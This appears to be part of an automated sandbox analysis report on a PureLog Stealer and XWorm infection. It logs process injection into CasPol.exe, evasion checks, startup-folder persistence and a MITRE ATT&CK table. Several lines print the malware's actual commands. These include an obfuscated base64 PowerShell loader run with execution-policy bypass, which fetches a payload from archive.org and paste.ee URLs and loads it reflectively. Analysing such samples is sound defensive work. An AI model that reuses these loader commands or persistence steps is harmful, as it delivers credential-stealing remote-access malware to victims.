                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3879Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5956Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 1497 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 3800 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 3468 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 6381 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5088Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6248Thread sleep count: 3879 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6248Thread sleep count: 5956 > 30Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000009.00000002.1735316360.000001697BAB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
                Source: CasPol.exe, 0000000A.00000002.2644477177.00000000011C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F5F008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: CasPol.exe, 0000000A.00000002.2644477177.0000000001181000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2644477177.00000000011C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.powershell.exe.1697be10000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1697be10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.16910e2f3a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.16910e2f3a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected XWorm
                Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2960, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.powershell.exe.1697be10000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1697be10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.16910e2f3a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.16910e2f3a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected XWorm
                Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2960, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts11
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		OS Credential Dumping1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		211
                Process Injection                		1
